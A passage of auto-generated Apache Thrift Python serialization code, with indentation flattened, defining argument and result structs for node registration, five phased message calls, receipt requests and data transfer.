if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_node_info_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_node_info_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (Node, Node.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = Node()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_node_info_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class register_node_args:
"""
Attributes:
- node
- pass_phrase
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'node', (Node, Node.thrift_spec), None, ), # 1
(2, TType.STRING, 'pass_phrase', None, None, ), # 2
)
def __init__(self, node=None, pass_phrase=None,):
self.node = node
self.pass_phrase = pass_phrase
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.node = Node()
self.node.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('register_node_args')
if self.node is not None:
oprot.writeFieldBegin('node', TType.STRUCT, 1)
self.node.write(oprot)
oprot.writeFieldEnd()
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 2)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.node)
value = (value * 31) ^ hash(self.pass_phrase)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class register_node_result:
"""
Attributes:
- success
- unauthorized
"""
thrift_spec = (
(0, TType.BOOL, 'success', None, None, ), # 0
(1, TType.STRUCT, 'unauthorized', (UnauthorizedException, UnauthorizedException.thrift_spec), None, ), # 1
)
def __init__(self, success=None, unauthorized=None,):
self.success = success
self.unauthorized = unauthorized
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.BOOL:
self.success = iprot.readBool()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.unauthorized = UnauthorizedException()
self.unauthorized.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('register_node_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.BOOL, 0)
oprot.writeBool(self.success)
oprot.writeFieldEnd()
if self.unauthorized is not None:
oprot.writeFieldBegin('unauthorized', TType.STRUCT, 1)
self.unauthorized.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
value = (value * 31) ^ hash(self.unauthorized)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class unregister_node_args:
"""
Attributes:
- pass_phrase
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'pass_phrase', None, None, ), # 1
)
def __init__(self, pass_phrase=None,):
self.pass_phrase = pass_phrase
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('unregister_node_args')
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.pass_phrase)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_1_message_args:
"""
Attributes:
- p1
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p1', (Phase_1_msg, Phase_1_msg.thrift_spec), None, ), # 1
)
def __init__(self, p1=None,):
self.p1 = p1
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p1 = Phase_1_msg()
self.p1.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_1_message_args')
if self.p1 is not None:
oprot.writeFieldBegin('p1', TType.STRUCT, 1)
self.p1.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p1)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_1_message_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype98, _size95) = iprot.readListBegin()
for _i99 in xrange(_size95):
_elem100 = iprot.readString()
self.success.append(_elem100)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_1_message_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter101 in self.success:
oprot.writeString(iter101)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_2_message_args:
"""
Attributes:
- p2
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p2', (Phase_2_msg, Phase_2_msg.thrift_spec), None, ), # 1
)
def __init__(self, p2=None,):
self.p2 = p2
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p2 = Phase_2_msg()
self.p2.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_2_message_args')
if self.p2 is not None:
oprot.writeFieldBegin('p2', TType.STRUCT, 1)
self.p2.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p2)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_2_message_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype105, _size102) = iprot.readListBegin()
for _i106 in xrange(_size102):
_elem107 = iprot.readString()
self.success.append(_elem107)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_2_message_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter108 in self.success:
oprot.writeString(iter108)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_3_message_args:
"""
Attributes:
- p3
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p3', (Phase_3_msg, Phase_3_msg.thrift_spec), None, ), # 1
)
def __init__(self, p3=None,):
self.p3 = p3
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p3 = Phase_3_msg()
self.p3.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_3_message_args')
if self.p3 is not None:
oprot.writeFieldBegin('p3', TType.STRUCT, 1)
self.p3.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p3)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_3_message_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype112, _size109) = iprot.readListBegin()
for _i113 in xrange(_size109):
_elem114 = iprot.readString()
self.success.append(_elem114)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_3_message_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter115 in self.success:
oprot.writeString(iter115)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_4_message_args:
"""
Attributes:
- p4
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p4', (Phase_4_msg, Phase_4_msg.thrift_spec), None, ), # 1
)
def __init__(self, p4=None,):
self.p4 = p4
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p4 = Phase_4_msg()
self.p4.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_4_message_args')
if self.p4 is not None:
oprot.writeFieldBegin('p4', TType.STRUCT, 1)
self.p4.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p4)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_4_message_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype119, _size116) = iprot.readListBegin()
for _i120 in xrange(_size116):
_elem121 = iprot.readString()
self.success.append(_elem121)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_4_message_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter122 in self.success:
oprot.writeString(iter122)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_5_message_args:
"""
Attributes:
- p5
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'p5', (Phase_5_msg, Phase_5_msg.thrift_spec), None, ), # 1
)
def __init__(self, p5=None,):
self.p5 = p5
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.p5 = Phase_5_msg()
self.p5.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_5_message_args')
if self.p5 is not None:
oprot.writeFieldBegin('p5', TType.STRUCT, 1)
self.p5.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.p5)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class phase_5_message_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype126, _size123) = iprot.readListBegin()
for _i127 in xrange(_size123):
_elem128 = iprot.readString()
self.success.append(_elem128)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('phase_5_message_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter129 in self.success:
oprot.writeString(iter129)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class receipt_request_args:
"""
Attributes:
- pass_phrase
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'pass_phrase', None, None, ), # 1
)
def __init__(self, pass_phrase=None,):
self.pass_phrase = pass_phrase
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('receipt_request_args')
if self.pass_phrase is not None:
oprot.writeFieldBegin('pass_phrase', TType.STRING, 1)
oprot.writeString(self.pass_phrase)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.pass_phrase)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class receipt_request_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRING,None), None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype133, _size130) = iprot.readListBegin()
for _i134 in xrange(_size130):
_elem135 = iprot.readString()
self.success.append(_elem135)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('receipt_request_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.LIST, 0)
oprot.writeListBegin(TType.STRING, len(self.success))
for iter136 in self.success:
oprot.writeString(iter136)
oprot.writeListEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __hash__(self):
value = 17
value = (value * 31) ^ hash(self.success)
return value
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class transfer_data_args:
"""
Attributes:
- pass_phrase
- received
- unreceived
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'pass_phrase', None, None, ), # 1
(2, TType.LIST, 'received', (TType.STRING,None), None, ), # 2
(3, TType.LIST, 'unreceived', (TType.STRING,None), None, ), # 3
)
def __init__(self, pass_phrase=None, received=None, unreceived=None,):
self.pass_phrase = pass_phrase
self.received = received
self.unreceived = unreceived
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.pass_phrase = iprot.readString()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.LIST:
self.received = []
(_etype140, _size137) = iprot.readListBegin()
for _i141 in xrange(_size137):
_elem142 = iprot.readString()
self.received.append(_elem142)
iprot.readListEnd()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.LIST:
self.unreceived = []
(_etype146, _size143) = iprot.readListBegin()
for _i147 in xrange(_size143):
_elem148 = iprot.readString()
